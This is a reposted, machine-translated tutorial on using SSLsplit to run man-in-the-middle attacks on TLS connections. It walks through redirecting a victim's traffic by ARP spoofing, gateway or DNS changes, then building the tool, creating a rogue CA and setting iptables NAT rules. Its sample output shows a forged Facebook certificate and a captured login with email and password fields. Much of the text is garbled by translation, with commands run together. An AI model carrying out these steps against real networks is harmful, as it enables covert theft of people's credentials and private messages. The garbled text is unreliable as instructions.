Using Sslsplit sniffer Tls/ssl connection

Source: Internet
Author: User


I recently demonstrated how to use mitmproxty to perform an intermediate person attack http (S) connection. When Mitmproxy work supports HTTP-based communication, it does not understand other TLS/SSL based traffic, such as FTPS, SMTP over SSL, IMAP over SSL, or some other protocol that overrides Tls/ssl.

Sslsplit is the general Tls/ssl agent for Man-in-the-middle attacks through all secure communication protocols. Using Sslsplit, you can intercept and store SSL-based traffic to listen to any secure connection.

1. Working principle

Sslsplit is very similar to other SSL proxy tools: it acts as an intermediary between the client and the server. As long as traffic is redirected to a server that Sslsplit runs (changing the default gateway, ARP spoofing, or other means), Sslsplit begins an SSL connection and pretends to be the server to which the client is connected. To do this, it dynamically claims a certificate that uses the CA certificate's private key (client-trusted) signature.

For example, if a customer wants to send an email using the Gmail SMTP server (the port creates a certificate for 465,sslsplit and then pretends to be a Gmail mail server pointing to the client. In the upstream direction (pointing to the real Gmil server), Sslsplit connects to the client, much like the common client of the moth--forwarding all the actual client-written traffic.

If you are interested in details, check out how to work part of the blog about HTTP interception with Mitmproxy. The basic concept is the same, so it's easier to understand.

2. Installation and Operation Sslsplit

How to intercept SSL (and non-SSL) traffic.

2.1 Traffic Redirection

2.1.1 uses ARP spoofing to map the traffic to the victim from the MAC address of the standard gateway by publishing the IP address to the attacker. You don't need physical access to the victim. View the Arpspoof tool.

2.1.2 modifies the victim's default gateway.

The simplest way to 2.1.3 is to have access to the victim's device.

2.1.4 strengthens the DSN and DNS server entry that can back the attacker's IP address. See the tutorial on DNS spoofing.

2.1.5 redirects each domain by modifying the/etc/hosts file.

The simplest method mentioned above is to change the victim's default gateway address to the attacker's IP. Make sure the traffic passes through your machine. Since we need to install the CA certificate later, we need physical access to the victim's machine.

2.2 Installation

Download and compile Sslsplit

1234567 wget http: //mirror /rel/sslsplit/sslsplit-0 .4.7. tar .bz2 bunzip2 sslsplit-0.4.7. tar .bz2   tar  xvf sslsplit-0.4.7. tar   CD   sslsplit-0.4.7 apt-get  install  libssl-dev libevent-dev Code class= "Bash functions" >make mkdir  / Tmp/sslsplit

2.3 Create and install a root CA certificate

In order for Sslsopit to act as an intermediary, its victim must trust the root CA certificate that stores the attacker. Depending on the type of client (browser, phone), the root certificate is still somewhat different

Generate a CA private key and certificate:

12 openssl genrsa -out ca.key 4096openssl req -new -x509 -days 1826 -key ca.key -out ca.crt

2.4 Enabling IP Forwarding and NAT engine (iptables)

In this example, Sslsplit will run on two ports: 8080 for non-SSL TCP connections, such as HTTP,SMTP or tfp;8443 for SSL connections, such as Smtp,https over SSL. The futuristic loading method arrives at the attacker's machine's package to these internal ports, which the NAT engine can be used.

123456789 sysctl -w net.ipv4.ip_forward=1iptables -t nat -Fiptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 5222 -j REDIRECT --to-ports 8080

2.5 Running Sslsplit

Once the IP forwarding is very active and the packet is forwarded to the relevant port, you can start sslsplit. That sounds simple, and so is the truth. Because Sslsplit is a very powerful tool, it is very flexible. You can see more detailed sslsplit manuals for more information.

Reasonable configuration of parameters:

123456789 ./SSLSPLIT  Code class= "HTML Spaces" >   -D     -L CONNECTIONS.LOG     -J /TMP/SSLSPLIT/     -S LOGDIR/     -K CA.KEY     -C CA.CER      SSL 8443      tcp 8080

This command starts in debug mode Sslsplit (-D, run in foreground, background not, verbose output), Output City Connection in log file "Connections.log" (-l ...). The real connection content is written in "/tmp/sslsplit/logdir/" (-j ... And-S. Each connection in each individual file has an incoming/outgoing TCP stream.

Assuming your configuration is correct, you can now start browsing and sending/receiving e-mails. Sslsplit to output the connection details on the console:

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647 [email protected]:~/sslsplit-0.4.7# ./sslsplit -D -l connections.log -j /tmp/sslsplit/ -S logdir/ -k ca.key -c ca.crt ssl 8443 tcp 8080Generated RSA key forleaf certs.SSLsplit 0.4.7 (built 2013-07-15)Copyright (c) 2009-2013, Daniel Roethlisberger <[email protected]> -DDISABLE_SSLV2_SESSION_CACHE -DHAVE_NETFILTERNAT engines: netfilter* tproxynetfilter:  IP_TRANSPARENT SOL_IPV6 !IPV6_ORIGINAL_DSTcompiled against OpenSSL 1.0.1c 10 May 2012 (1000103f)rtlinked against OpenSSL 1.0.1c 10 May 2012 (1000103f)TLS Server Name Indication (SNI) supportedOpenSSL is thread-safe with THREADIDSSL/TLSalgorithm availability: RSA DSA ECDSA DH ECDH ECOpenSSL option availability: SSL_OP_NO_COMPRESSION SSL_OP_NO_TICKET SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION SSL_OP_TLS_ROLLBACK_BUGcompiled against libevent 2.0.19-stablertlinked against libevent 2.0.19-stable4 CPU cores detectedproxyspecs:- []:8080 tcp plain netfilter- []:8443 ssl plain netfilterLoaded CA: ‘/C=DE/ST=HE/O=Fake CA Certificate/CN=Fake CA Certificate‘Using libevent backend ‘epoll‘Event base supports: edge yes, O(1) yes, anyfd noInserted events:  0x94b380 [fd 7] Read Persist  0x94ba40 [fd 8] Read Persist  0x94d4c0 [fd 9] Read Persist  0x94b1b8 [fd 6] Read Persist  0x94d550 [fd 3] Signal Persist  0x94d7b0 [fd 1] Signal Persist  0x94d920 [fd 2] Signal Persist  0x94da90 [fd 13] Signal PersistStarted 8 connection handling threadsStarting main event loop.SNI peek: [] [complete]Connecting to []:443===> Original server certificate:Subject DN: /C=US/ST=California/L=Palo Alto/O=Facebook, Inc./CN=*.facebook.comCommon Names: ** f5:6b:f2:44:63:b0:bd:61:36:c5:e8:72:34:6b:32:04:28:ff:4d:7cCertificate cache: MISS===> Forged server certificate:Subject DN: /C=US/ST=California/L=Palo Alto/O=Facebook, Inc./CN=*.facebook.comCommon Names: ** 54:de:df:bb:30:95:36:57:c9:11:8d:5f:1f:b6:53:cc:0e:12:e5:b3ssl []:39447 []:443 crt:** origcrt:**

Each file indicates that the TCP socket can be opened, showing the exact time, source and destination IP address and port. You can see in the file header:

12345678910 [email protected]:/tmp/sslsplit/logdir# head 20130804T162258Z-[]:39327-[]:443.log GET / HTTP/1.1Host: www.facebook.comConnection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Cookie: …

3. Example

You can use Sslsplit to listen to different protocols. Below are a few examples of HTTPS, SSL-based IMAP and SMTP via SSL.

3.1 Sniffing HTTPS ( &

Once Sslsplit starts running, all communication between the client and the actual server passes through Sslsplit. Using the-D option, sslsplit prints out the connection and certificate forgery in stdout. In addition, the content is LogDir ("/tmp/sslsplit/logdir"). With Tail-f/tmp/sslsplit/loggdir/20130804t162301z-*.log, you can follow communication between the client and the server.

The output of the sslsplit is shown in the above. This indicates that the upstream Facebook certificate is true, with the Sslsplit forged certificate, two fingerprints different because it was signed by a different certification authority.

The lower console displays the contents of the HTTPS communication. This shows the HTTPS POST request "Https://", including my user name (&email=) and password (&pass=).

If a person clicks on a small lock image on any SSL/TLS encrypted website while redirecting traffic through Sslsplit, the certificate is issued to the true CN, organization (O), and organizational unit (OU), but not by a real ca.

Other examples can be viewed

This article by 360 security broadcast translation, reprint please specify "Transfer from 360 security broadcast", and attached link.
Original link:

The above is the original

It's my test success picture.

Using Sslsplit sniffer Tls/ssl connection

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

Tags Index: